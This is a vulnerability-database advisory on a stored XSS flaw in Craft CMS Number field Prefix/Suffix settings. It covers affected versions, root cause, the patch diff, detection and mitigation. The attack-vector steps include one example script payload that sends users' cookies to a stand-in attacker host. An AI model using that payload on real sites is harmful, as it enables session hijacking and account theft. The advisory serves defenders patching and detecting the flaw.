Skip to main content
CVE Vulnerability Database
Vulnerability Database/CVE-2026-25496

CVE-2026-25496: Craft CMS Stored XSS Vulnerability

CVE-2026-25496 is a stored XSS vulnerability in Craft CMS that exploits improperly escaped Number field settings, allowing attackers to execute malicious scripts. This article covers technical details, affected versions, and patches.

Published:

CVE-2026-25496 Overview

CVE-2026-25496 is a stored Cross-Site Scripting (XSS) vulnerability affecting Craft CMS, a popular platform for creating digital experiences. The vulnerability exists in the Number field type settings where the Prefix and Suffix fields are rendered using the |md|raw Twig filter without proper output encoding. This flaw allows attackers with administrative privileges to inject malicious scripts that execute when the Number field is displayed on users' profiles.

Critical Impact

Administrative users can inject persistent malicious scripts through Number field Prefix/Suffix settings, potentially compromising user sessions and data when the field is rendered on profile pages.

Affected Products

  • Craft CMS versions 4.0.0-RC1 through 4.16.17
  • Craft CMS versions 5.0.0-RC1 through 5.8.21

Discovery Timeline

  • 2026-02-09 - CVE-2026-25496 published to NVD
  • 2026-02-09 - Last updated in NVD database

Technical Details for CVE-2026-25496

Vulnerability Analysis

This stored XSS vulnerability (CWE-79) stems from improper output encoding in Craft CMS's Number field type component. When administrators configure Number fields, they can specify Prefix and Suffix text values that are displayed alongside the numeric input. These values pass through the Twig templating engine using the |md(inlineOnly=true)|raw filter chain, which renders Markdown content but fails to properly encode HTML entities, allowing embedded JavaScript to execute in users' browsers.

The attack requires administrator-level privileges to configure the malicious field settings, but the payload persists and executes for any user who views a profile containing the affected Number field. This creates a privilege escalation vector where an administrator could potentially capture session tokens or perform actions on behalf of other users, including other administrators.

Root Cause

The root cause is insufficient output encoding in the Twig template file src/templates/_components/fieldtypes/Number/input.twig. The template uses the |md(inlineOnly=true)|raw filter combination to render the Prefix and Suffix values. While the |md filter processes Markdown syntax, the |raw filter marks the output as safe HTML without encoding, allowing any HTML and JavaScript embedded in the original input to render unescaped in the browser context.

Attack Vector

The attack vector is network-based and requires high privileges (administrator access) along with user interaction (victim viewing the affected profile page). An attacker with administrative access to Craft CMS could:

  1. Navigate to the Number field configuration settings
  2. Insert malicious JavaScript in the Prefix or Suffix field (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>)
  3. Save the field configuration
  4. Wait for users to view profile pages containing the Number field, triggering script execution

The following patch demonstrates the security fix implemented by the Craft CMS team:

text
 <div class="flex">
     {% if hasPrefix %}
         <div aria-hidden="true">
-            {{ prefix|t('site')|md(inlineOnly=true)|raw }}
+            {{ prefix|t('site')|md(inlineOnly=true,encode=true)|raw }}
         </div>
     {% endif %}
     <div>

Source: GitHub Commit Update

The fix adds the encode=true parameter to the md filter, ensuring HTML entities are properly encoded before output, preventing script injection while preserving Markdown rendering functionality.

Detection Methods for CVE-2026-25496

Indicators of Compromise

  • Unexpected JavaScript code or HTML tags present in Number field Prefix or Suffix configuration values
  • Anomalous outbound network requests originating from user browsers when viewing profile pages
  • Audit log entries showing modifications to Number field settings with suspicious content patterns
  • User reports of unexpected behavior or redirects when viewing profiles

Detection Strategies

  • Implement content security policies (CSP) to detect and block inline script execution
  • Monitor Craft CMS audit logs for field configuration changes containing script tags or event handlers
  • Deploy web application firewall (WAF) rules to detect XSS patterns in administrative form submissions
  • Conduct periodic database audits of field settings tables for malicious content

Monitoring Recommendations

  • Enable detailed logging for Craft CMS administrative actions, particularly field configuration changes
  • Configure alerts for CSP violation reports that may indicate attempted XSS exploitation
  • Monitor for unusual authentication patterns that could suggest session hijacking from XSS attacks
  • Review Number field configurations during routine security assessments

How to Mitigate CVE-2026-25496

Immediate Actions Required

  • Upgrade Craft CMS 4.x installations to version 4.16.18 or later immediately
  • Upgrade Craft CMS 5.x installations to version 5.8.22 or later immediately
  • Audit existing Number field configurations for any suspicious Prefix or Suffix values
  • Review administrative access logs for unauthorized field configuration changes

Patch Information

The vulnerability is fully remediated in Craft CMS versions 4.16.18 and 5.8.22. The security patch modifies the Number field input template to include proper HTML encoding via the encode=true parameter in the Markdown filter. Detailed information about the fix is available in the GitHub Security Advisory GHSA-9f5h-mmq6-2x78 and the patched release 5.8.22.

Workarounds

  • Restrict administrative access to trusted users only until the patch can be applied
  • Implement a strict Content Security Policy (CSP) with script-src 'self' to mitigate XSS impact
  • Manually audit and sanitize all existing Number field Prefix and Suffix values
  • Consider disabling Number field customization features temporarily in high-risk environments
bash
# Example CSP header configuration for nginx
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'none';" always;

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.